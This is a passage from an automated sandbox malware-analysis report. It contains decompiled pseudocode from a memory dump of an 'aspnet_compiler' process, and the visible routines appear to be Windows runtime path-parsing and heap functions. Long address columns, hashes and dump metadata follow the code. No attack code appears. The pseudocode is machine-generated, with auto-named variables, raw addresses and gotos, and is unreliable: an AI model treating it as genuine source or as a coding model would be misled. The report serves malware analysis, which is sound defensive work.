				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x128d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E011CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E011B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L011B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E011B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M011B45F8))) {
												case 0:
													_v568 = 0x1171078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x11711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L011B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E011DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E011DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E011952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E011AEB70(1, 0x12879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E011AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E011D95D0();
																			L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E011DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E011D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E011DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                        0x011b4128
                                                                                        0x011b4135
                                                                                        0x011b413c
                                                                                        0x011b4141
                                                                                        0x011b4145
                                                                                        0x011b4147
                                                                                        0x011b414e
                                                                                        0x011b4151
                                                                                        0x011b4159
                                                                                        0x011b415c
                                                                                        0x011b4160
                                                                                        0x011b4164
                                                                                        0x011b4168
                                                                                        0x011b416c
                                                                                        0x011b417f
                                                                                        0x011b4181
                                                                                        0x011b446a
                                                                                        0x011b446a
                                                                                        0x011b418c
                                                                                        0x011b4195
                                                                                        0x011b4199
                                                                                        0x011b4432
                                                                                        0x011b4439
                                                                                        0x011b443d
                                                                                        0x011b4442
                                                                                        0x011b4447
                                                                                        0x00000000
                                                                                        0x011b419f
                                                                                        0x011b41a3
                                                                                        0x011b41b1
                                                                                        0x011b41b9
                                                                                        0x011b41bd
                                                                                        0x011b45db
                                                                                        0x011b45db
                                                                                        0x00000000
                                                                                        0x011b41c3
                                                                                        0x011b41c3
                                                                                        0x011b41ce
                                                                                        0x011b41d4
                                                                                        0x011fe138
                                                                                        0x011fe13e
                                                                                        0x011fe169
                                                                                        0x011fe16d
                                                                                        0x011fe19e
                                                                                        0x011fe16f
                                                                                        0x011fe16f
                                                                                        0x011fe175
                                                                                        0x011fe179
                                                                                        0x011fe18f
                                                                                        0x011fe193
                                                                                        0x00000000
                                                                                        0x011fe199
                                                                                        0x00000000
                                                                                        0x011fe199
                                                                                        0x011fe193
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b41da
                                                                                        0x011b41da
                                                                                        0x011b41df
                                                                                        0x011b41e4
                                                                                        0x011b41ec
                                                                                        0x011b4203
                                                                                        0x011b4207
                                                                                        0x011fe1fd
                                                                                        0x011b4222
                                                                                        0x011b4226
                                                                                        0x011fe1f3
                                                                                        0x011fe1f3
                                                                                        0x011b422c
                                                                                        0x011b422c
                                                                                        0x011b4233
                                                                                        0x011fe1ed
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b4239
                                                                                        0x011b4239
                                                                                        0x011b4239
                                                                                        0x011b4239
                                                                                        0x011b4233
                                                                                        0x011b4226
                                                                                        0x011b41ee
                                                                                        0x011b41ee
                                                                                        0x011b41f4
                                                                                        0x011b4575
                                                                                        0x011fe1b1
                                                                                        0x011fe1b1
                                                                                        0x00000000
                                                                                        0x011b457b
                                                                                        0x011b457b
                                                                                        0x011b4582
                                                                                        0x011fe1ab
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b4588
                                                                                        0x011b4588
                                                                                        0x011b458c
                                                                                        0x011fe1c4
                                                                                        0x011fe1c4
                                                                                        0x00000000
                                                                                        0x011b4592
                                                                                        0x011b4592
                                                                                        0x011b4599
                                                                                        0x011fe1be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b459f
                                                                                        0x011b459f
                                                                                        0x011b45a3
                                                                                        0x011fe1d7
                                                                                        0x011fe1e4
                                                                                        0x00000000
                                                                                        0x011b45a9
                                                                                        0x011b45a9
                                                                                        0x011b45b0
                                                                                        0x011fe1d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b45b6
                                                                                        0x011b45b6
                                                                                        0x011b45b6
                                                                                        0x00000000
                                                                                        0x011b45b6
                                                                                        0x011b45b0
                                                                                        0x011b45a3
                                                                                        0x011b4599
                                                                                        0x011b458c
                                                                                        0x011b4582
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b41f4
                                                                                        0x011b423e
                                                                                        0x011b4241
                                                                                        0x011b45c0
                                                                                        0x011b45c4
                                                                                        0x00000000
                                                                                        0x011b45ca
                                                                                        0x011b45ca
                                                                                        0x00000000
                                                                                        0x011fe207
                                                                                        0x011fe20f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b45d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011b45ca
                                                                                        0x00000000
                                                                                        0x011b4247
                                                                                        0x011b4247
                                                                                        0x011b4247
                                                                                        0x011b4249
                                                                                        0x011b4249
                                                                                        0x011b4249
                                                                                        0x011b4251
                                                                                        0x011b4251
                                                                                        0x011b4257
                                                                                        0x011b425f
                                                                                        0x011b426e
                                                                                        0x011b4270
                                                                                        0x011b427a
                                                                                        0x011fe219
                                                                                        0x011fe219
                                                                                        0x011b4280
                                                                                        0x011b4282
                                                                                        0x011b4456
                                                                                        0x011b45ea
                                                                                        0x00000000
                                                                                        0x011b45f0
                                                                                        0x011fe223
                                                                                        0x00000000
                                                                                        0x011fe223
                                                                                        0x011b445c
                                                                                        0x011b445c
                                                                                        0x00000000
                                                                                        0x011b445c
                                                                                        0x00000000
                                                                                        0x011b4288
                                                                                        0x011b428c
                                                                                        0x011fe298
                                                                                        0x011b4292
                                                                                        0x011b4292
                                                                                        0x011b429e
                                                                                        0x011b42a3
                                                                                        0x011b42a7
                                                                                        0x011b42ac
                                                                                        0x011fe22d
                                                                                        0x011b42b2
                                                                                        0x011b42b2
                                                                                        0x011b42b9
                                                                                        0x011b42bc
                                                                                        0x011b42c2
                                                                                        0x011b42ca
                                                                                        0x011b42cd
                                                                                        0x011b42cd
                                                                                        0x011b42d4
                                                                                        0x011b433f
                                                                                        0x011b433f
                                                                                        0x011b42d6
                                                                                        0x011b42d6
                                                                                        0x011b42d9
                                                                                        0x011b42dd
                                                                                        0x011b42eb
                                                                                        0x011fe23a
                                                                                        0x011b42f1
                                                                                        0x011b4305
                                                                                        0x011b430d
                                                                                        0x011b4315
                                                                                        0x011b4318
                                                                                        0x011b431f
                                                                                        0x011b4322
                                                                                        0x011b432e
                                                                                        0x011b433b
                                                                                        0x011b433b
                                                                                        0x00000000
                                                                                        0x011b432e
                                                                                        0x011b42eb
                                                                                        0x011b434c
                                                                                        0x011b434e
                                                                                        0x011b4352
                                                                                        0x011b4359
                                                                                        0x011b435e
                                                                                        0x011b4361
                                                                                        0x011b436e
                                                                                        0x011b438a
                                                                                        0x011b438e
                                                                                        0x011b4396
                                                                                        0x011b439e
                                                                                        0x011b43a1
                                                                                        0x011b43ad
                                                                                        0x011b43bb
                                                                                        0x011b43bb
                                                                                        0x011b43ad
                                                                                        0x011b436e
                                                                                        0x011b43bf
                                                                                        0x011b43c5
                                                                                        0x011b4463
                                                                                        0x011b4463
                                                                                        0x011b43ce
                                                                                        0x011b43d5
                                                                                        0x011b43d9
                                                                                        0x011b43df
                                                                                        0x011b4475
                                                                                        0x011b4479
                                                                                        0x011b4491
                                                                                        0x011b4491
                                                                                        0x011b4479
                                                                                        0x011b43e5
                                                                                        0x011b43eb
                                                                                        0x011b43f4
                                                                                        0x011b43f6
                                                                                        0x011b43f9
                                                                                        0x011b43fc
                                                                                        0x011b43ff
                                                                                        0x011b44e8
                                                                                        0x011b44ed
                                                                                        0x011b44f3
                                                                                        0x011fe247
                                                                                        0x00000000
                                                                                        0x011b44f9
                                                                                        0x011b4504
                                                                                        0x011b4508
                                                                                        0x011b450f
                                                                                        0x011fe269
                                                                                        0x00000000
                                                                                        0x011b4515
                                                                                        0x011b4519
                                                                                        0x011b4531
                                                                                        0x011b4534
                                                                                        0x011b4537
                                                                                        0x011b453e
                                                                                        0x011b4541
                                                                                        0x011b454a
                                                                                        0x011fe255
                                                                                        0x011fe255
                                                                                        0x011fe25b
                                                                                        0x011fe25e
                                                                                        0x011fe261
                                                                                        0x011fe261
                                                                                        0x011b4555
                                                                                        0x011b4559
                                                                                        0x011b455d
                                                                                        0x011fe26d
                                                                                        0x011fe270
                                                                                        0x011fe274
                                                                                        0x011fe27a
                                                                                        0x011fe27d
                                                                                        0x011fe28e
                                                                                        0x011fe28e
                                                                                        0x011b4563
                                                                                        0x011b4563
                                                                                        0x011b4569
                                                                                        0x011b4569
                                                                                        0x00000000
                                                                                        0x011b455d
                                                                                        0x011b450f
                                                                                        0x00000000
                                                                                        0x011b44f3
                                                                                        0x011b43ff
                                                                                        0x011b4405
                                                                                        0x011b4405
                                                                                        0x011b4405
                                                                                        0x011b42ac
                                                                                        0x011b428c
                                                                                        0x011b4282
                                                                                        0x011b4407
                                                                                        0x011b440d
                                                                                        0x011fe2af
                                                                                        0x011fe2af
                                                                                        0x011b4413
                                                                                        0x011b4413
                                                                                        0x00000000
                                                                                        0x011b41d4
                                                                                        0x00000000
                                                                                        0x011b41c3
                                                                                        0x011b41bd
                                                                                        0x011b4415
                                                                                        0x011b4415
                                                                                        0x011b4416
                                                                                        0x011b4417
                                                                                        0x011b4429
                                                                                        0x011b416e
                                                                                        0x011b416e
                                                                                        0x011b4175
                                                                                        0x011b4498
                                                                                        0x011b449f
                                                                                        0x011fe12d
                                                                                        0x00000000
                                                                                        0x011fe133
                                                                                        0x00000000
                                                                                        0x011fe133
                                                                                        0x011b44a5
                                                                                        0x011b44a5
                                                                                        0x011b44aa
                                                                                        0x00000000
                                                                                        0x011b44bb
                                                                                        0x011b44ca
                                                                                        0x011b44d6
                                                                                        0x011b44d7
                                                                                        0x011b44d8
                                                                                        0x011b44e3
                                                                                        0x011b44e3
                                                                                        0x011b44aa
                                                                                        0x011b417b
                                                                                        0x011b417b
                                                                                        0x011b417b
                                                                                        0x00000000
                                                                                        0x011b417b
                                                                                        0x011b4175
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 893fd97150b9e535a2ce49a0296177d1236d5a06efd27dcb78da82414d562780
                                                                                        • Instruction ID: 7e9fc8b6f153259f706bf9981a1cf86b9a19c3bb5940ad9fd458ffcd2f2428d3
                                                                                        • Opcode Fuzzy Hash: 893fd97150b9e535a2ce49a0296177d1236d5a06efd27dcb78da82414d562780
                                                                                        • Instruction Fuzzy Hash: 13F16D746082118FD72CCF19C4C0ABAB7E1EF98714F05896EF586CB6A2E734D895CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E011C20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1288714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E011C2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E011C2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E011958EC(_t240);
									_t221 =  *0x1285cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1285cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E011D4A2C(0x1286e40, 0x11d4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E011B7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1175c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E011CF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E011CF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01217016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L011B2400(_t267 + 0x20);
															}
															L011B2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E011C2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E011B2280(_t134, 0x1288608);
									__eflags =  *0x1286e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E011AFFB0(_t198, _t241, 0x1288608);
										__eflags = _t253;
										if(_t253 != 0) {
											L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1286e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1288608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E011C6B90(_t210,  &_v64);
										_t262 =  *0x1288608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E011CE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E011D97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
